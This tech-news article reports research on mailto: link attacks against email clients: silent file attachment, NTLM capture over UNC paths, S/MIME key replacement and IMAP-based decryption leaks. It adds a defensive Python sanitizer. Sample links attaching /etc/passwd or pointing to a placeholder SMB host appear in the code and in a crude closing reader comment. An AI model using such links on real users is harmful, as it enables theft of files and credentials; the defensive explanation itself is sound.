Some mail clients are vulnerable to manipulation attacks when using "mailto:"

Researchers from the Ruhr University in Bochum, Germany, analyzed the behavior of email clients when handling "mailto:" links with extended parameters.

Five of the twenty email clients they analyzed were vulnerable to a resource manipulation attack using the "attach" parameter.

Six more email clients were affected by the PGP and S/MIME key replacement attack, and three clients were vulnerable to an attack that retrieves the content of encrypted messages.

The "mailto:" links are used to automate the opening of a mail client in order to write an email to the recipient specified in the link. In addition to the address, as part of the link, you can specify additional parameters, such as the subject line and template for typical content.

The proposed attack manipulates the "attach" parameter to attach a file to the generated email.

Of the email clients analyzed, the following are mentioned:

The Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) and Pegasus Mail clients were vulnerable to a trivial attack that automatically attached any specified local file through a link such as "mailto:?attach=path_to_file".

The file is attached without any notice, so unless the attachment is specifically highlighted, the user may not realize that the message will be sent with it.

This flaw is simple to exploit: to obtain application-specific files, nothing more is needed than specifying the path. For example, it could be used to obtain cryptocurrency wallets, database files or other data of interest.

In addition to local files, some email clients process links to network storage and paths on the IMAP server.

In particular, IBM Notes allows a file to be transferred from a network directory when processing links such as "attach=\\site.com\file", and also allows NTLM authentication parameters to be intercepted by pointing the link at an attacker-controlled SMB server (the request is sent with the current user's authentication credentials).

In the particular case of Thunderbird, the client successfully handled requests to attach the contents of folders on the IMAP server.

At the same time, messages retrieved from IMAP that are encrypted with OpenPGP or S/MIME are automatically decrypted by the mail client before they are sent.

Thunderbird developers were notified in February, and the issue has now been fixed in Thunderbird 78 (the Thunderbird 52, 60 and 68 branches are still vulnerable).

Previous versions of Thunderbird were also vulnerable to two other attack variants for PGP and S/MIME proposed by the researchers.

Although Thunderbird removed support for mailto:?attach, it still seems to be present in distributions that use xdg-email to parse mailto URLs.
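As an added illustration of the defensive side (this is not code from the researchers, from Thunderbird or from xdg-email), the Python below shows how a mailto: handler or a wrapper around xdg-email could restrict a link to the header fields that RFC 6068 defines and report anything else, classifying a stripped attach value as a local path, a UNC share (the NTLM case described above) or an IMAP URL. The function names, the sample links and the placeholder host evil.example are my own.

```python
from urllib.parse import parse_qs, urlencode

# Header fields that RFC 6068 defines for mailto: links. Everything else
# (notably the "attach"/"attachment" parameters discussed above) is dropped.
ALLOWED_FIELDS = {"to", "cc", "bcc", "subject", "body"}


def sanitize_mailto(url):
    """Keep only allowed header fields of a mailto: URL and report the rest.
    Returns (clean_url, dropped); dropped is a list of (field, value) pairs
    in the order they appeared, with field names lower-cased."""
    if url[:7].lower() != "mailto:":
        raise ValueError("not a mailto: URL")
    rest = url[7:]
    # RFC 6068 allows an empty address part, e.g. "mailto:?attach=...".
    addr, _, query = rest.partition("?")
    kept, dropped = {}, []
    # parse_qs percent-decodes both names and values, so an encoded
    # "%61ttach" is still recognised as "attach".
    for field, values in parse_qs(query, keep_blank_values=True).items():
        name = field.lower()  # header field names are case-insensitive
        if name in ALLOWED_FIELDS:
            kept[name] = values
        else:
            dropped.extend((name, v) for v in values)
    clean = "mailto:" + addr
    if kept:
        clean += "?" + urlencode(kept, doseq=True)
    return clean, dropped


def classify_attach_target(value):
    """Describe where a stripped attach value points, for logging:
    a UNC share, an IMAP folder, a local path, or something else."""
    v = value.strip()
    if v.startswith("\\\\") or v.startswith("//"):
        return "unc"  # \\server\share style; a remote SMB fetch
    if v.lower().startswith(("imap://", "imaps://")):
        return "imap"
    if v.startswith(("/", "~")) or (len(v) > 1 and v[1] == ":"):
        return "local"
    return "other"


if __name__ == "__main__":
    # Constructed sample links; evil.example is a placeholder host.
    for link in ("mailto:?attach=/etc/passwd",
                 "mailto:alice@example.com?subject=Hi&Attach=%5C%5Cevil.example%5Cshare%5Cf"):
        clean, dropped = sanitize_mailto(link)
        print(clean, [(n, v, classify_attach_target(v)) for n, v in dropped])
```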

Specifically, Thunderbird, as well as Outlook, PostBox, eM Client, MailMate and R2Mail2, were susceptible to a key replacement attack, caused by the fact that the mail client automatically imports and installs new certificates transmitted in S/MIME messages, which allows an attacker to substitute public keys already stored by the user.

The second attack, to which Thunderbird, PostBox and MailMate were exposed, abuses the autosave mechanism for draft messages and allows the mailto parameters to be used to initiate decryption of encrypted messages or the digital signing of arbitrary messages, with the result subsequently transferred to the attacker's IMAP server.

In this attack, the ciphertext is transmitted through the "body" parameter and a "meta refresh" tag is used to initiate a connection to the attacker's IMAP server.

For automatic processing of "mailto:" links without user intervention, specially crafted PDF documents can be used: the OpenAction entry in a PDF allows the mailto handler to be started automatically when the document is opened.

Finally, if you are interested in learning more about the subject, you can consult the research paper at the following link.

Raul don't ask any more weight said:

malito: mishuevos@gmail.com?attatch=/etc/passwd send me e-mail